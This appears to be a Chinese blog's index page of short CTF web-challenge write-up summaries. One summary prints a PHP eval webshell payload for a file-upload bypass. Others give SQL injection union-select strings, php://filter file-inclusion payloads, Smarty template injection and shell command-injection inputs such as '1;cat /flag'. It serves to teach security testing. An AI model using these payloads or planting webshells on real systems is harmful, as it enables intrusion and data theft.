摘要: md5碰撞 强比较 1.抓包 2.发现传参被加密了,应该有一个base64,解码然后又得到一个base64编码,一串16进制,解码后得到555.png,可得传入文件名被进行了俩次base64加密和一次hex加密 3.尝试将index.php按照上面的加密传入,得到TmprMlpUWTBOalUzT0 阅读全文
posted @ 2022-01-19 14:25 L0VEhzzz 阅读(200) 评论(0) 推荐(0) 编辑
摘要: 1.点flag显示了ip,可能和X-Forwarded-For有关系,再点上面的hint,提示 2.抓个包看看,加个X-Forwarded-For,可能有模板注入 3.ip改成,返回了49,语句被执行了,确实存在Smarty模板引擎注入(https://blog.csdn.net/qq_455212 阅读全文
posted @ 2022-01-19 14:24 L0VEhzzz 阅读(30) 评论(0) 推荐(0) 编辑
摘要: scandir() 函数 返回指定目录中的文件和目录的数组。 var_dump() 函数用于输出变量的相关信息。 var_dump() 函数显示关于一个或多个表达式的结构信息,包括表达式的类型与值。数组将递归展开值,通过缩进显示其结构。 file_get_contents — 将整个文件读入一个字符 阅读全文
posted @ 2022-01-19 14:18 L0VEhzzz 阅读(50) 评论(0) 推荐(0) 编辑
摘要: 简单的文件上传漏洞题目 题目要求上传图片那我们就考虑上传一个phtml文件,然后抓包改下上传文件的类型 将里面的内容改为一句话木马,为我们后面的蚁剑连接做准备 GIF89a <script language="php">eval($_POST['hhz']);</script> 上面的头是gif的文 阅读全文
posted @ 2022-01-19 13:05 L0VEhzzz 阅读(36) 评论(0) 推荐(0) 编辑
摘要: 简单题 进入后看到一个菜刀还有一个eval($_POST["Syc"] 还有标题的白给的shell 应该是web的后门题目 应该直接直接用菜刀或者蚁剑连接后门即可 Syc就是后门 根目录中直接就能看到flag 阅读全文
posted @ 2022-01-19 12:39 L0VEhzzz 阅读(46) 评论(0) 推荐(0) 编辑
摘要: 一道基础的SQL注入题目 笔记: 爆破数据库:union select 1,2,group_concat(column_name) from information_schema.schemata%23 爆破表名 :union select 1,2,group_concat(table_name) 阅读全文
posted @ 2022-01-19 12:32 L0VEhzzz 阅读(31) 评论(0) 推荐(0) 编辑
摘要: php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用。 php://filter/resource=<待过滤的数据流>(就是文件的路径) php://filter/read=<读链需要应用的过滤器列表>(就是具体的操作) ?file=php://filter/convert 阅读全文
posted @ 2022-01-18 15:47 L0VEhzzz 阅读(63) 评论(0) 推荐(0) 编辑
摘要: 这道题就是利用管道符来做 可以直接在ping输入框中输入1;cat /fag;也可以 1|cat /flag 1&cat /flag 当然如果使用 ||必须需要前面是一个假的,就是前面条件为假才执行后面的否则只执行前面的 所以可以用 a||cat /flag 以上方法都可以得到结果 笔记 1、|(就 阅读全文
posted @ 2022-01-18 15:01 L0VEhzzz 阅读(51) 评论(0) 推荐(0) 编辑
摘要: 界面有个tips,点击后就来到了?file=flag.php,写着can you find the flag 直接尝试利用php://filter伪协议进行文件包含 构造?file=php://filter/convert.base64-encode/resource=flag.php 这句话的意思 阅读全文
posted @ 2022-01-18 14:28 L0VEhzzz 阅读(18) 评论(0) 推荐(0) 编辑
摘要: F12查看源码,看到了一串php代码 就是传参cat要等于dog,直接?cat=dog即可得到答案(当然后面的syc{}不是flag,我试过了) 阅读全文
posted @ 2022-01-18 14:18 L0VEhzzz 阅读(11) 评论(0) 推荐(0) 编辑